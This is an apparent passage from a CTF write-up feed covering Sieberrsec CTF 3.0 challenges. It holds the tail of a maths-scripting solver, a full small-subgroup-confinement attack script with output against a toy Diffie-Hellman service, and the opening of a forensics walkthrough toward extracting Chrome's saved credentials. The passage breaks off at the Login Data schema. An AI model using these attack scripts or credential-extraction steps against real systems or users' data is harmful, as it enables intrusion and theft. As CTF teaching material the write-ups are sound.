class="nb">format</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">challenge</span><span class="p">.</span><span class="n">decode</span><span class="p">(),</span> <span class="n">solution</span><span class="p">))</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Congratulations! You CAN math it</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">())</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script yields the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Opening connection to challs.sieberrsec.tech on port 29079: Done [*] Challenge 0: 360 / 510 / 350 = 0 [*] Challenge 1: 845 - 303 / 294 = 843 [*] Challenge 2: 814 * 232 - 427 = 188421 [*] Challenge 3: 924 / 510 - 714 = -712 [*] Challenge 4: 941 + 367 - 712 = 596 [*] Challenge 5: 772 / 294 + 734 = 736 [*] Challenge 6: 86 * 323 / 191 = 145 [*] Challenge 7: 189 / 532 + 830 = 830 [*] Challenge 8: 473 / 788 - 500 = -499 [*] Challenge 9: 639 * 889 * 190 = 107933490 [*] Challenge 10: 611 / 508 / 240 = 0 </span><span class="c">... </span><span class="go">[*] Challenge 94: 698 * 558 - 118 = 389366 [*] Challenge 95: 922 - 815 + 252 = 359 [*] Challenge 96: 82 * 147 - 947 = 11107 [*] Challenge 97: 719 / 91 * 360 = 2844 [*] Challenge 98: 444 - 463 - 478 = -497 [*] Challenge 99: 104 - 284 / 650 = 103 [+] The flag is IRS{4f2cd85d0a9f32f4} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{4f2cd85d0a9f32f4}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: Typical math scripting challenge. Just providing the solution for a safeeval version to avoid insecure evaluation of untrusted inputs.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-diffieskeyexchange2<p>Summary: Applying the small subgroup attack in a pseudo Diffie Hellman key exchange scheme that does not give the public A value allows for an attacker to control the potential values of the shared secret used to encrypt a flag sent back to the attacker. This makes it feasible to iterate through the possible keys to decrypt the flag.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Diffie's Key Exchange 2 Cryptography Solves (4) - 895 Points Diffie learnt that his implementation of the system wasn't secure :&lt;&lt; and made some changes. Try it now! Connect here: nc challs.sieberrsec.tech 1338 chall.py </span></code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/sieberrsec3.0/chall-diffie2.py">challenge file</a></p> <h2 id="solution">Solution</h2> <p>We are given a Python script that implements a pseudo form of the Diffie Hellman key exchange scheme. The issue here is that only the generator <code class="language-plaintext highlighter-rouge">g</code> and the prime modulus <code class="language-plaintext highlighter-rouge">p</code> is given, not the public key <code class="language-plaintext highlighter-rouge">A</code> computed by <code class="language-plaintext highlighter-rouge">g^a % p</code> which is typically required in the standard key negotiation scheme to obtain the shared secret.</p> <p>This ‘shared’ secret is used to encrypt the flag, thus our objective is to somehow control the value of this secret without using the trivial values of <code class="language-plaintext highlighter-rouge">1</code> or <code class="language-plaintext highlighter-rouge">p-1</code>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">random</span> <span class="kn">import</span> <span class="nn">hashlib</span> <span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> <span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">getPrime</span><span class="p">,</span> <span class="n">long_to_bytes</span> <span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">pad</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'flag.txt'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">flag</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span> <span class="n">g</span> <span class="o">=</span> <span class="mi">5</span> <span class="n">p</span> <span class="o">=</span> <span class="n">getPrime</span><span class="p">(</span><span class="mi">512</span><span class="p">)</span> <span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="n">A</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">g</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"WELCOME TO DIFFIE'S KEY EXCHANGE!!!!!</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'g: </span><span class="si">{</span><span class="n">g</span><span class="si">}</span><span class="s">'</span><span class="p">,</span> <span class="sa">f</span><span class="s">'p: </span><span class="si">{</span><span class="n">p</span><span class="si">}</span><span class="s">'</span><span class="p">,</span> <span class="n">sep</span><span class="o">=</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">B</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">What is your public key?</span><span class="se">\n</span><span class="s">"</span><span class="p">))</span> <span class="k">if</span> <span class="ow">not</span> <span class="mi">1</span> <span class="o">&lt;</span> <span class="n">B</span> <span class="o">&lt;</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">'Sneakyyyyy....'</span><span class="p">)</span> <span class="nb">exit</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="n">shared_secret</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">B</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="n">key</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">shared_secret</span><span class="p">)).</span><span class="n">digest</span><span class="p">()</span> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_ECB</span><span class="p">)</span> <span class="n">enc</span> <span class="o">=</span> <span class="n">cipher</span><span class="p">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">pad</span><span class="p">(</span><span class="n">flag</span><span class="p">,</span> <span class="mi">16</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">'</span><span class="se">\n</span><span class="s">encrypted flag: </span><span class="si">{</span><span class="n">enc</span><span class="p">.</span><span class="nb">hex</span><span class="p">()</span><span class="si">}</span><span class="s">'</span><span class="p">)</span> </code></pre></div></div> <p>An example run of the program looks like:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python chall.py <span class="go">WELCOME TO DIFFIE'S KEY EXCHANGE!!!!! g: 5 p: 7073777320102035715823648131537089890340861621438176702853737334100006916991407396992223330415000600499666889633196080596929221612545938856275346857404807 What is your public key? 12345 encrypted flag: 435d1960f90a1987cfdf8e8589773c65 </span></code></pre></div></div> <p>Looking for previous CTF challenges involving <a href="https://en.wikipedia.org/wiki/Small_subgroup_confinement_attack">small subgroup confinement attacks</a> yields a challenge called <a href="https://sasdf.github.io/ctf/tasks/2018/ais3Final/crypto/300-xorlnarmoni'akda/">xorlnarmoni’akda</a>.</p> <p>The important points from the writeup are:</p> <ul> <li>Factorising <code class="language-plaintext highlighter-rouge">p-1</code> gives us the sizes of the subgroups of the finite field over prime <code class="language-plaintext highlighter-rouge">p</code>.</li> <li>Generators for these subgroups can be computed by picking a random <code class="language-plaintext highlighter-rouge">r</code> that is not <code class="language-plaintext highlighter-rouge">1</code> or <code class="language-plaintext highlighter-rouge">-1</code> and evaluating <code class="language-plaintext highlighter-rouge">pow(r, (p-1) // subgroup_size, p)</code>.</li> <li>Our challenge gives the constraint that these generators must lie between <code class="language-plaintext highlighter-rouge">1</code> and <code class="language-plaintext highlighter-rouge">p - 1</code> exclusive so we have to reject the non-compliant generators.</li> <li>This generator will produce n elements of the subgroup size for any exponent used when computing <code class="language-plaintext highlighter-rouge">pow(g, a, p)</code>. Thus, we want to start with the smaller subgroups to reduce the AES key search space.</li> </ul> <p>A Python script implementing this attack is given as follows:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="c1"># With reference to https://sasdf.github.io/ctf/tasks/2018/ais3Final/crypto/300-xorlnarmoni'akda/. </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span> <span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="n">long_to_bytes</span> <span class="kn">from</span> <span class="nn">Crypto.Util.Padding</span> <span class="kn">import</span> <span class="n">unpad</span> <span class="c1"># pip install primefac </span><span class="kn">import</span> <span class="nn">primefac</span> <span class="kn">import</span> <span class="nn">random</span> <span class="kn">import</span> <span class="nn">hashlib</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="c1"># p = process(["python", "chall.py"]) </span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'challs.sieberrsec.tech'</span><span class="p">,</span> <span class="mi">1338</span><span class="p">)</span> <span class="c1"># Get g </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'g: '</span><span class="p">)</span> <span class="n">g</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">())</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'generator = {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">g</span><span class="p">))</span> <span class="c1"># Get p </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'p: '</span><span class="p">)</span> <span class="n">modulus</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">())</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'prime modulus = {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">modulus</span><span class="p">))</span> <span class="c1"># Check that p is prime and factor p-1. </span> <span class="k">if</span> <span class="ow">not</span> <span class="n">primefac</span><span class="p">.</span><span class="n">isprime</span><span class="p">(</span><span class="n">modulus</span><span class="p">):</span> <span class="n">log</span><span class="p">.</span><span class="n">error</span><span class="p">(</span><span class="s">"The provided modulus is not prime!"</span><span class="p">)</span> <span class="k">return</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"The modulus is confirmed prime."</span><span class="p">)</span> <span class="n">factors</span> <span class="o">=</span> <span class="n">primefac</span><span class="p">.</span><span class="n">primefac</span><span class="p">(</span><span class="n">modulus</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="n">seen_factors</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span> <span class="c1"># Most likely 2 is a factor and thus provides a subgroup of size 2 but this generalises it. </span> <span class="k">for</span> <span class="n">factor</span> <span class="ow">in</span> <span class="n">factors</span><span class="p">:</span> <span class="k">if</span> <span class="n">factor</span> <span class="ow">in</span> <span class="n">seen_factors</span><span class="p">:</span> <span class="k">continue</span> <span class="n">seen_factors</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">factor</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Testing subgroup size {}, if this is too big, please restart.'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">factor</span><span class="p">))</span> <span class="c1"># Test 1000 integers. </span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1000</span><span class="p">):</span> <span class="n">generator_candidate</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">modulus</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="n">candidate</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">generator_candidate</span><span class="p">,</span> <span class="p">(</span><span class="n">modulus</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">//</span> <span class="n">factor</span><span class="p">,</span> <span class="n">modulus</span><span class="p">)</span> <span class="k">if</span> <span class="n">candidate</span> <span class="o">!=</span> <span class="p">(</span><span class="n">modulus</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="ow">and</span> <span class="n">candidate</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Found candidate: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">candidate</span><span class="p">))</span> <span class="c1"># Find the possible shared values. </span> <span class="n">possible_shared</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span> <span class="n">ctr</span> <span class="o">=</span> <span class="mi">1</span> <span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">possible_shared</span><span class="p">)</span> <span class="o">!=</span> <span class="n">factor</span><span class="p">:</span> <span class="n">possible_shared</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">candidate</span><span class="p">,</span> <span class="n">ctr</span><span class="p">,</span> <span class="n">modulus</span><span class="p">))</span> <span class="n">ctr</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Candidate has {} elements in subgroup: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">possible_shared</span><span class="p">),</span> <span class="n">possible_shared</span><span class="p">))</span> <span class="c1"># Now that we have all we need to predict the possible shared secrets, send the </span> <span class="c1"># candidate. </span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">candidate</span><span class="p">).</span><span class="n">encode</span><span class="p">())</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'encrypted flag: '</span><span class="p">)</span> <span class="c1"># Get the encrypted flag and try to decrypt it. </span> <span class="n">encrypted_flag</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">().</span><span class="n">strip</span><span class="p">().</span><span class="n">decode</span><span class="p">()</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Encrypted flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">encrypted_flag</span><span class="p">))</span> <span class="k">for</span> <span class="n">shared</span> <span class="ow">in</span> <span class="n">possible_shared</span><span class="p">:</span> <span class="n">key</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">shared</span><span class="p">)).</span><span class="n">digest</span><span class="p">()</span> <span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="p">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="p">.</span><span class="n">MODE_ECB</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">decrypted_flag</span> <span class="o">=</span> <span class="n">unpad</span><span class="p">(</span><span class="n">cipher</span><span class="p">.</span><span class="n">decrypt</span><span class="p">(</span><span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">encrypted_flag</span><span class="p">)),</span> <span class="mi">16</span><span class="p">)</span> <span class="k">if</span> <span class="sa">b</span><span class="s">'IRS{'</span> <span class="ow">in</span> <span class="n">decrypted_flag</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">'Flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">decrypted_flag</span><span class="p">.</span><span class="n">decode</span><span class="p">()))</span> <span class="k">return</span> <span class="k">except</span><span class="p">:</span> <span class="k">pass</span> <span class="k">return</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us the flag:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Opening connection to challs.sieberrsec.tech on port 1338: Done [*] generator = 5 [*] prime modulus = 10825308872879721949075084480589739135613768878046508437798488882374928178964605436687265343911730293963921252288858056140801387959016711368887755373884633 [*] The modulus is confirmed prime. [*] Testing subgroup size 2, if this is too big, please restart. [*] Testing subgroup size 3, if this is too big, please restart. [*] Found candidate: 2799472089545395126674853020489604564914518834747192924377242808839128120814339550917605237702625175135197994905931567052130656294583264910976368932597496 [*] Candidate has 3 elements in subgroup: {1, 2799472089545395126674853020489604564914518834747192924377242808839128120814339550917605237702625175135197994905931567052130656294583264910976368932597496, 8025836783334326822400231460100134570699250043299315513421246073535800058150265885769660106209105118828723257382926489088670731664433446457911386441287136} [*] Encrypted flag: e9ab9fd773a30fc34ae628f1918941ee0ca00a3c2e4faba8a4fc9fc77af3bf2b [+] Flag: IRS{5m411_5ubgr0up_4tt4cc} </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{5m411_5ubgr0up_4tt4cc}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: Applying the small subgroup attack in a pseudo Diffie Hellman key exchange scheme that does not give the public A value allows for an attacker to control the potential values of the shared secret used to encrypt a flag sent back to the attacker. This makes it feasible to iterate through the possible keys to decrypt the flag.

2021-12-28T00:00:00+08:002021-12-28T00:00:00+08:00https://nandynarwhals.org/sieberrsec-ctf-3.0-digginginthedump<p>Summary: A dump of a Windows user’s AppData containing Google Chrome library data files and Windows DPAPI master key files can be used in conjunction with the user’s computer password to extract saved website login credentials.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <p>Part 1:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Digging In The Dump Pt. I Forensics Solves (31) - 266 Points Our friend, Alex, used to visit a website, but ever since his computer died the url to the website was lost! The only hope now lies in his old hard drive, which was salvaged from his pc Hopefully something useful can be found Here is a dump of his %APPDATA% folder Can you help him find the website? </code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/sieberrsec3.0/AppData.zip">challenge file</a></p> <p>Part 2:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Digging In The Dump Pt. II Forensics Solves (9) - 292 Points After finding that website, perhaps you can find the saved credentials to login to his account? (Using the same file in Pt. I) Computer username: Alex Computer password: Password1 (These are NOT the login credentials for the website) </code></pre></div></div> <h2 id="solution">Solution</h2> <h3 id="part-1">Part 1</h3> <p>We are given a large 250MB zip file containing a Windows user’s Application Data directory.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>file AppData.zip <span class="go">AppData.zip: Zip archive data, at least v2.0 to extract </span><span class="gp">$</span><span class="w"> </span>find AppData | <span class="nb">head</span> <span class="go">AppData AppData/LocalLow AppData/LocalLow/Microsoft AppData/LocalLow/Microsoft/CryptnetUrlCache AppData/LocalLow/Microsoft/CryptnetUrlCache/Content AppData/LocalLow/Microsoft/CryptnetUrlCache/Content/6BADA8974A10C4BD62CC921D13E43B18_AD319D6DA1A11BC83AC8B4E4D3638231 AppData/LocalLow/Microsoft/CryptnetUrlCache/Content/80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 AppData/LocalLow/Microsoft/CryptnetUrlCache/Content/57C8EDB95DF3F0AD4EE2DC2B8CFD4157 AppData/LocalLow/Microsoft/CryptnetUrlCache/Content/77EC63BDA74BD0D0E0426DC8F8008506 AppData/LocalLow/Microsoft/CryptnetUrlCache/Content/E0968A1E3A40D2582E7FD463BAEB59CD </span><span class="c">... </span></code></pre></div></div> <p>We can look for a few browsers to look for browser history artifacts. To start with, Google Chrome <a href="https://www.foxtonforensics.com/browser-history-examiner/chrome-history-location">stores the visited URLs</a> in the <code class="language-plaintext highlighter-rouge">History</code> file. This file is present in the dump:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>find AppData | <span class="nb">grep </span>Chrome | <span class="nb">grep </span>History <span class="go">AppData/Local/Google/Chrome/User Data/Default/History-journal AppData/Local/Google/Chrome/User Data/Default/History </span></code></pre></div></div> <p>The file can be opened with the <code class="language-plaintext highlighter-rouge">sqlite3</code> program and the correct table can be identified using the <code class="language-plaintext highlighter-rouge">.schema</code> command.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>sqlite3 <span class="s1">'AppData/Local/Google/Chrome/User Data/Default/History'</span> <span class="go">SQLite version 3.32.3 2020-06-18 14:16:19 Enter ".help" for usage hints. </span><span class="gp">sqlite&gt;</span><span class="w"> </span>.schema <span class="c">... </span><span class="gp">CREATE TABLE urls(id INTEGER PRIMARY KEY AUTOINCREMENT,url LONGVARCHAR,title LONGVARCHAR,visit_count INTEGER DEFAULT 0 NOT NULL,typed_count INTEGER DEFAULT 0 NOT NULL,last_visit_time INTEGER NOT NULL,hidden INTEGER DEFAULT 0 NOT NULL);</span><span class="w"> </span><span class="c">... </span></code></pre></div></div> <p>Selecting from the table yields a pertinent URL with the <code class="language-plaintext highlighter-rouge">challs.sieberrsec.tech</code> domain name.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">sqlite&gt;</span><span class="w"> </span><span class="k">select</span> <span class="k">*</span> from urls<span class="p">;</span> <span class="go">1|https://www.google.com/search?q=bing&amp;oq=bing&amp;aqs=chrome..69i57j0i433i512j46i433i512j0i131i433i512j0i512j0i131i433i512l3j46i433i512j46i512.1018j0j7&amp;sourceid=chrome&amp;ie=UTF-8|bing - Google Search|2|0|13284792092515784|0 2|http://www.bing.com/|Bing|1|0|13284792132998452|0 3|https://www.bing.com/|Bing|1|0|13284792132998452|0 4|https://www.bing.com/search?q=google&amp;form=QBLH&amp;sp=-1&amp;pq=google&amp;sc=8-6&amp;qs=n&amp;sk=&amp;cvid=E0635C87D5F44F3A8C498FEAB34156BB|google - Search|1|0|13284792153017298|0 5|http://www.google.com.sg/|Google|1|0|13284792155381137|0 6|https://www.google.com.sg/?gws_rd=ssl|Google|2|0|13284792155754230|0 7|https://www.google.com.sg/search?q=cookies+near+me&amp;source=hp&amp;ei=NE_FYfmVGPWO4-EPz8KI6Ac&amp;iflsig=ALs-wAMAAAAAYcVdRA0CQ1NwjvY3j8cWR4dLEAdaR-_Y&amp;ved=0ahUKEwj5_8Sez_v0AhV1xzgGHU8hAn0Q4dUDCAk&amp;uact=5&amp;oq=cookies+near+me&amp;gs_lcp=Cgdnd3Mtd2l6EAMyCAgAEIAEEMkDMgUIABCSAzIFCAAQgAQyBQgAEIAEMgUIABCABDIFCAAQgAQyBQgAEIAEMgUIABCABDIFCAAQgAQyBQgAEIAEOg4ILhCPARDqAhCMAxDlAjoOCAAQjwEQ6gIQjAMQ5QI6CAgAELEDEIMBOg4ILhCABBCxAxDHARDRAzoUCC4QgAQQsQMQgwEQxwEQrwEQ1AI6CAgAEIAEELEDOgUIABCxAzoUCC4QgAQQsQMQxwEQowIQ1AIQiwM6EQgAEIAEELEDEIsDEKYDEKgDOg4IABCABBCxAxCDARCLAzoOCC4QsQMQgwEQxwEQowI6DgguEIAEELEDEMcBEKMCOgsIABCABBCxAxCDAToICC4QgAQQsQM6CwguEIAEELEDENQCOg4ILhCxAxCDARDHARCvAToRCC4QgAQQsQMQgwEQxwEQowI6DgguEIAEEMcBEK8BEIsDOggIABCABBCLAzoLCC4QgAQQxwEQrwFQqE5Ysl5g2WRoBHAAeACAAYoBiAHGBpIBBDE0LjGYAQCgAQGwAQq4AQI&amp;sclient=gws-wiz|cookies near me - Google Search|2|0|13284792170964074|0 8|https://www.google.com.sg/search?q=Best+butter+cookies+in+Singapore&amp;sa=X&amp;ved=2ahUKEwjinbylz_v0AhVr7XMBHQjTBCsQ1QJ6BAgcEAE&amp;biw=988&amp;bih=620&amp;dpr=1|Best butter cookies in Singapore - Google Search|3|0|13284792739005609|0 9|https://www.lifestyleasia.com/sg/food-drink/dining/best-cookies-in-singapore-delivery/|7 best cookies in Singapore by local bakers to try this weekend|1|0|13284792304156059|0 10|https://www.theweddingvowsg.com/best-cookie-shops-singapore/|7 Best Cookie Shops in Singapore | Best of Lifestyle 2021|1|0|13284792743089170|0 11|http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190|Flag|1|0|13284792773737661|0 12|http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/|Flag|2|0|13284792797469196|0 </span><span class="gp">sqlite&gt;</span><span class="w"> </span></code></pre></div></div> <p>Retrieving the webpage gives us the flag along with a login form:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>curl <span class="s1">'http://challs.sieberrsec.tech:23547/dcfa237943d4fd7e2a514ca54642efaccd2cdbd5003bfb19a1e70737273e1190/'</span> <span class="gp">&lt;!DOCTYPE html&gt;</span><span class="w"> </span><span class="gp">&lt;html&gt;</span><span class="w"> </span><span class="gp"> &lt;head&gt;</span><span class="w"> </span><span class="gp"> &lt;Title&gt;</span>Login&lt;/Title&gt; <span class="c"> ... </span><span class="gp"> &lt;/head&gt;</span><span class="w"> </span><span class="gp"> &lt;body&gt;</span><span class="w"> </span><span class="gp"> &lt;div class="topnav"&gt;</span><span class="w"> </span><span class="gp"> &lt;h1&gt;</span>Login Page&lt;/h1&gt; <span class="gp"> &lt;/div&gt;</span><span class="w"> </span><span class="gp"> &lt;br&gt;</span>&lt;br&gt; <span class="gp"> &lt;div class="login"&gt;</span><span class="w"> </span><span class="gp"> &lt;p&gt;</span>IRS<span class="o">{</span>D1ggiNg_1N_tH3_chR0M3_h15t0rY<span class="o">}</span>&lt;/p&gt; <span class="gp"> &lt;form method="post" class='loginform'&gt;</span><span class="w"> </span><span class="gp"> &lt;input type="text" name="username" placeholder="Username" required&gt;</span><span class="w"> </span><span class="gp"> &lt;input type="password" name="password" placeholder="Password" required&gt;</span><span class="w"> </span><span class="go"> </span><span class="gp"> &lt;input type="submit" name="submit" value="Login"&gt;</span><span class="w"> </span><span class="gp"> &lt;/form&gt;</span><span class="w"> </span><span class="gp"> &lt;/div&gt;</span><span class="w"> </span><span class="gp"> &lt;/body&gt;</span><span class="w"> </span><span class="gp">&lt;/html&gt;</span><span class="w"> </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">IRS{D1ggiNg_1N_tH3_chR0M3_h15t0rY}</code></p> <h3 id="part-2">Part 2</h3> <p>In the second part, we are supposed to login to the webpage, presumably using saved login credentials. The version of Google Chrome used in this challenge is relatively new:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> <span class="s1">'AppData/Local/Google/Chrome/User Data/Last Version'</span> <span class="go">96.0.4664.110 </span></code></pre></div></div> <p>According to <a href="https://www.foxtonforensics.com/blog/post/analysing-chrome-login-data">Foxton Forensics</a>, the file containing the saved credential data is <code class="language-plaintext highlighter-rouge">Login Data</code>. From the schema, it appears that the pertinent table is <code class="language-plaintext highlighter-rouge">logins</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>sqlite3 <span class="s1">'AppData/Local/Google/Chrome/User Data/Default/Login Data'</span> <span class="go">SQLite version 3.32.3 2020-06-18 14:16:19 Enter ".help" for usage hints. </span><span class="gp">sqlite&gt;</span><span class="w"> </span>.schema <span class="c">... </span><span class="gp">CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR 